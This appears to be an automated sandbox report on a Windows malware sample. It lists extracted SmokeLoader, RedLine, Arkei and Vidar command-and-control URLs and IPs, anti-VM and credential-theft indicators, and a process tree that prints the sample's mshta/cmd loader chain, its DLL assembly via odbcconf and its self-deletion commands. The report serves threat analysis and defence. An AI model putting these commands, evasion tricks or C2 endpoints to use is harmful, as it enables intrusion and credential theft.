Analysis
-
max time kernel
151s -
max time network
137s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
29/11/2021, 14:48
Static task
static1
Behavioral task
behavioral1
Sample
190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe
Resource
win10-en-20211104
General
-
Target
190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe
-
Size
335KB
-
MD5
48632eaf14caab096c6cc50c0ed237a0
-
SHA1
1c8832a5824d71d55f2d39fe5b849fdbd6aba537
-
SHA256
190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5
-
SHA512
06163c6724a1d1e80a58a216fcafbd804f82118eced30ff73e593af874f4a2935af0167c273aefb623f9b31df49989030f0779703379e0da350516b95a5d22eb
Malware Config
Extracted
smokeloader
2020
http://host-data-coin-11.com/
http://file-coin-host-12.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
redline
185.189.167.130:38637
Extracted
arkei
Default
http://file-file-host4.com/tratata.php
Extracted
redline
bbtt1
212.193.30.196:13040
Extracted
vidar
48.7
706
https://mstdn.social/@anapa
https://mastodon.social/@mniami
-
profile_id
706
Signatures
-
Bazar Loader
Detected loader normally used to deploy BazarBackdoor malware.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral1/memory/2568-132-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2568-133-0x0000000000418EEE-mapping.dmp family_redline behavioral1/memory/3464-237-0x0000000004F60000-0x0000000004F8E000-memory.dmp family_redline behavioral1/memory/3464-242-0x0000000005250000-0x000000000527C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
-
Arkei Stealer Payload 2 IoCs
resource yara_rule behavioral1/memory/2400-162-0x00000000036A0000-0x00000000036C1000-memory.dmp family_arkei behavioral1/memory/2400-163-0x0000000000400000-0x0000000003232000-memory.dmp family_arkei -
Bazar/Team9 Loader payload 2 IoCs
resource yara_rule behavioral1/memory/1700-197-0x00000000006F0000-0x000000000071A000-memory.dmp BazarLoaderVar6 behavioral1/memory/3972-357-0x0000021285A40000-0x0000021285A6A000-memory.dmp BazarLoaderVar6 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/4000-274-0x00000000036B0000-0x0000000003785000-memory.dmp family_vidar behavioral1/memory/4000-284-0x0000000000400000-0x000000000329A000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 16 IoCs
pid Process 3540 247D.exe 2568 247D.exe 904 5F93.exe 2400 7FCE.exe 2136 C620.exe 2964 C99B.exe 2112 5b1_g~qYDZdSZ8W.eXe 3464 D218.exe 2540 C99B.exe 1296 E3EC.exe 4000 F10C.exe 2660 wbgveig 2076 ttgveig 1928 2C80.exe 1436 wbgveig 3284 55A4.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion E3EC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2C80.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2C80.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion E3EC.exe -
Deletes itself 1 IoCs
pid Process 3064 Process not Found -
Loads dropped DLL 7 IoCs
pid Process 1700 regsvr32.exe 2400 7FCE.exe 3616 odbcconf.exe 3616 odbcconf.exe 2400 7FCE.exe 2400 7FCE.exe 3972 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000600000001abb5-191.dat themida behavioral1/files/0x000600000001abb5-190.dat themida behavioral1/memory/1296-201-0x00000000012B0000-0x00000000019F2000-memory.dmp themida behavioral1/memory/1296-204-0x00000000012B0000-0x00000000019F2000-memory.dmp themida behavioral1/memory/1296-208-0x00000000012B0000-0x00000000019F2000-memory.dmp themida behavioral1/memory/1296-210-0x00000000012B0000-0x00000000019F2000-memory.dmp themida behavioral1/files/0x000900000001abb3-299.dat themida behavioral1/files/0x000900000001abb3-300.dat themida behavioral1/memory/1928-302-0x0000000000250000-0x0000000000932000-memory.dmp themida behavioral1/memory/1928-303-0x0000000000250000-0x0000000000932000-memory.dmp themida behavioral1/memory/1928-305-0x0000000000250000-0x0000000000932000-memory.dmp themida behavioral1/memory/1928-306-0x0000000000250000-0x0000000000932000-memory.dmp themida -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA E3EC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2C80.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1296 E3EC.exe 1928 2C80.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3708 set thread context of 3288 3708 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe 68 PID 3540 set thread context of 2568 3540 247D.exe 72 PID 2964 set thread context of 2540 2964 C99B.exe 90 PID 2660 set thread context of 1436 2660 wbgveig 112 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 15 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5F93.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5F93.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ttgveig Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ttgveig Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wbgveig Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wbgveig Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5F93.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C99B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C99B.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C99B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ttgveig Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wbgveig -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7FCE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7FCE.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 E3EC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString E3EC.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 F10C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString F10C.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 2C80.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 2C80.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 1988 timeout.exe 4004 timeout.exe 1512 timeout.exe 1752 timeout.exe -
Kills process with taskkill 2 IoCs
pid Process 3376 taskkill.exe 2416 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3288 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe 3288 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found 3064 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3064 Process not Found -
Suspicious behavior: MapViewOfSection 9 IoCs
pid Process 3288 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe 904 5F93.exe 3064 Process not Found 3064 Process not Found 2540 C99B.exe 3064 Process not Found 3064 Process not Found 2076 ttgveig 1436 wbgveig -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeDebugPrivilege 2568 247D.exe Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeDebugPrivilege 2416 taskkill.exe Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeDebugPrivilege 3464 D218.exe Token: SeShutdownPrivilege 3064 Process not Found Token: SeCreatePagefilePrivilege 3064 Process not Found Token: SeShutdownPrivilege 3064 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3708 wrote to memory of 3288 3708 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe 68 PID 3708 wrote to memory of 3288 3708 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe 68 PID 3708 wrote to memory of 3288 3708 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe 68 PID 3708 wrote to memory of 3288 3708 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe 68 PID 3708 wrote to memory of 3288 3708 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe 68 PID 3708 wrote to memory of 3288 3708 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe 68 PID 3064 wrote to memory of 3540 3064 Process not Found 70 PID 3064 wrote to memory of 3540 3064 Process not Found 70 PID 3064 wrote to memory of 3540 3064 Process not Found 70 PID 3540 wrote to memory of 2568 3540 247D.exe 72 PID 3540 wrote to memory of 2568 3540 247D.exe 72 PID 3540 wrote to memory of 2568 3540 247D.exe 72 PID 3540 wrote to memory of 2568 3540 247D.exe 72 PID 3540 wrote to memory of 2568 3540 247D.exe 72 PID 3540 wrote to memory of 2568 3540 247D.exe 72 PID 3540 wrote to memory of 2568 3540 247D.exe 72 PID 3540 wrote to memory of 2568 3540 247D.exe 72 PID 3064 wrote to memory of 904 3064 Process not Found 74 PID 3064 wrote to memory of 904 3064 Process not Found 74 PID 3064 wrote to memory of 904 3064 Process not Found 74 PID 3064 wrote to memory of 2400 3064 Process not Found 75 PID 3064 wrote to memory of 2400 3064 Process not Found 75 PID 3064 wrote to memory of 2400 3064 Process not Found 75 PID 3064 wrote to memory of 1700 3064 Process not Found 76 PID 3064 wrote to memory of 1700 3064 Process not Found 76 PID 3064 wrote to memory of 2136 3064 Process not Found 77 PID 3064 wrote to memory of 2136 3064 Process not Found 77 PID 3064 wrote to memory of 2136 3064 Process not Found 77 PID 2136 wrote to memory of 3684 2136 C620.exe 78 PID 2136 wrote to memory of 3684 2136 C620.exe 78 PID 2136 wrote to memory of 3684 2136 C620.exe 78 PID 3064 wrote to memory of 2964 3064 Process not Found 79 PID 3064 wrote to memory of 2964 3064 Process not Found 79 PID 3064 wrote to memory of 2964 3064 Process not Found 79 PID 3684 wrote to memory of 1384 3684 mshta.exe 80 PID 3684 wrote to memory of 1384 3684 mshta.exe 80 PID 3684 wrote to memory of 1384 3684 mshta.exe 80 PID 1384 wrote to memory of 2112 1384 cmd.exe 82 PID 1384 wrote to memory of 2112 1384 cmd.exe 82 PID 1384 wrote to memory of 2112 1384 cmd.exe 82 PID 1384 wrote to memory of 2416 1384 cmd.exe 83 PID 1384 wrote to memory of 2416 1384 cmd.exe 83 PID 1384 wrote to memory of 2416 1384 cmd.exe 83 PID 2112 wrote to memory of 2340 2112 5b1_g~qYDZdSZ8W.eXe 84 PID 2112 wrote to memory of 2340 2112 5b1_g~qYDZdSZ8W.eXe 84 PID 2112 wrote to memory of 2340 2112 5b1_g~qYDZdSZ8W.eXe 84 PID 3064 wrote to memory of 3464 3064 Process not Found 85 PID 3064 wrote to memory of 3464 3064 Process not Found 85 PID 3064 wrote to memory of 3464 3064 Process not Found 85 PID 2340 wrote to memory of 3608 2340 mshta.exe 87 PID 2340 wrote to memory of 3608 2340 mshta.exe 87 PID 2340 wrote to memory of 3608 2340 mshta.exe 87 PID 2964 wrote to memory of 2540 2964 C99B.exe 90 PID 2964 wrote to memory of 2540 2964 C99B.exe 90 PID 2964 wrote to memory of 2540 2964 C99B.exe 90 PID 2964 wrote to memory of 2540 2964 C99B.exe 90 PID 2964 wrote to memory of 2540 2964 C99B.exe 90 PID 2964 wrote to memory of 2540 2964 C99B.exe 90 PID 3064 wrote to memory of 1296 3064 Process not Found 91 PID 3064 wrote to memory of 1296 3064 Process not Found 91 PID 3064 wrote to memory of 1296 3064 Process not Found 91 PID 2112 wrote to memory of 1204 2112 5b1_g~qYDZdSZ8W.eXe 92 PID 2112 wrote to memory of 1204 2112 5b1_g~qYDZdSZ8W.eXe 92 PID 2112 wrote to memory of 1204 2112 5b1_g~qYDZdSZ8W.eXe 92 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe"C:\Users\Admin\AppData\Local\Temp\190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Users\Admin\AppData\Local\Temp\190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe"C:\Users\Admin\AppData\Local\Temp\190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3288
-
-
C:\Users\Admin\AppData\Local\Temp\247D.exeC:\Users\Admin\AppData\Local\Temp\247D.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3540 -
C:\Users\Admin\AppData\Local\Temp\247D.exeC:\Users\Admin\AppData\Local\Temp\247D.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
C:\Users\Admin\AppData\Local\Temp\5F93.exeC:\Users\Admin\AppData\Local\Temp\5F93.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:904
-
C:\Users\Admin\AppData\Local\Temp\7FCE.exeC:\Users\Admin\AppData\Local\Temp\7FCE.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2400 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7FCE.exe" & exit2⤵PID:3896
-
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:1512
-
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\A894.dll1⤵
- Loads dropped DLL
PID:1700
-
C:\Users\Admin\AppData\Local\Temp\C620.exeC:\Users\Admin\AppData\Local\Temp\C620.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCrIPT: ClOSE (CREaTEOBjeCt ( "wscRipT.shell" ).RUN ( "C:\Windows\system32\cmd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\C620.exe"" ..\5b1_g~qYDZdSZ8W.eXe&&StaRT ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq & If """" == """" for %o iN ( ""C:\Users\Admin\AppData\Local\Temp\C620.exe"") do taskkill -F -IM ""%~Nxo"" ", 0 , True ) )2⤵
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\C620.exe" ..\5b1_g~qYDZdSZ8W.eXe&&StaRT ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq & If "" == "" for %o iN ( "C:\Users\Admin\AppData\Local\Temp\C620.exe") do taskkill -F -IM "%~Nxo"3⤵
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCrIPT: ClOSE (CREaTEOBjeCt ( "wscRipT.shell" ).RUN ( "C:\Windows\system32\cmd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe"" ..\5b1_g~qYDZdSZ8W.eXe&&StaRT ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq & If ""-PVQQIyT0eqsTq "" == """" for %o iN ( ""C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe"") do taskkill -F -IM ""%~Nxo"" ", 0 , True ) )5⤵
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe" ..\5b1_g~qYDZdSZ8W.eXe&&StaRT ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq & If "-PVQQIyT0eqsTq " == "" for %o iN ( "C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe") do taskkill -F -IM "%~Nxo"6⤵PID:3608
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscriPT:CLOse(crEatEobJect ( "WSCRIPT.sHEll"). run ( "C:\Windows\system32\cmd.exe /C echO | Set /p = ""MZ"" > Y9P8GeW.SYt& coPy /y /b Y9P8GeW.Syt+ iDTWeX.KR + 6VXIK.D + WNYGk.9UB ..\6KSsiU1.MB & del /Q *& STaRt odbcconf /a { REgsvr ..\6ksSIU1.MB } " ,0 , tRuE) )5⤵PID:1204
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C echO | Set /p = "MZ" > Y9P8GeW.SYt& coPy /y /b Y9P8GeW.Syt+ iDTWeX.KR + 6VXIK.D + WNYGk.9UB ..\6KSsiU1.MB & del /Q *& STaRt odbcconf /a { REgsvr ..\6ksSIU1.MB }6⤵PID:2068
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echO "7⤵PID:2148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>Y9P8GeW.SYt"7⤵PID:1316
-
-
C:\Windows\SysWOW64\odbcconf.exeodbcconf /a { REgsvr ..\6ksSIU1.MB }7⤵
- Loads dropped DLL
PID:3616
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -IM "C620.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\C99B.exeC:\Users\Admin\AppData\Local\Temp\C99B.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Users\Admin\AppData\Local\Temp\C99B.exeC:\Users\Admin\AppData\Local\Temp\C99B.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2540
-
-
C:\Users\Admin\AppData\Local\Temp\D218.exeC:\Users\Admin\AppData\Local\Temp\D218.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3464
-
C:\Users\Admin\AppData\Local\Temp\E3EC.exeC:\Users\Admin\AppData\Local\Temp\E3EC.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:1296 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\ICYgACgqMyH & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\E3EC.exe"2⤵PID:404
-
C:\Windows\SysWOW64\timeout.exetimeout 43⤵
- Delays execution with timeout.exe
PID:1752
-
-
-
C:\Users\Admin\AppData\Local\Temp\F10C.exeC:\Users\Admin\AppData\Local\Temp\F10C.exe1⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4000 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im F10C.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\F10C.exe" & del C:\ProgramData\*.dll & exit2⤵PID:2220
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im F10C.exe /f3⤵
- Kills process with taskkill
PID:3376
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:1988
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:3896
-
C:\Users\Admin\AppData\Roaming\wbgveigC:\Users\Admin\AppData\Roaming\wbgveig1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2660 -
C:\Users\Admin\AppData\Roaming\wbgveigC:\Users\Admin\AppData\Roaming\wbgveig2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1436
-
-
C:\Users\Admin\AppData\Roaming\ttgveigC:\Users\Admin\AppData\Roaming\ttgveig1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2076
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:3588
-
C:\Users\Admin\AppData\Local\Temp\2C80.exeC:\Users\Admin\AppData\Local\Temp\2C80.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:1928 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\wkFeMoTvexDJT & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2C80.exe"2⤵PID:2188
-
C:\Windows\SysWOW64\timeout.exetimeout 43⤵
- Delays execution with timeout.exe
PID:4004
-
-
-
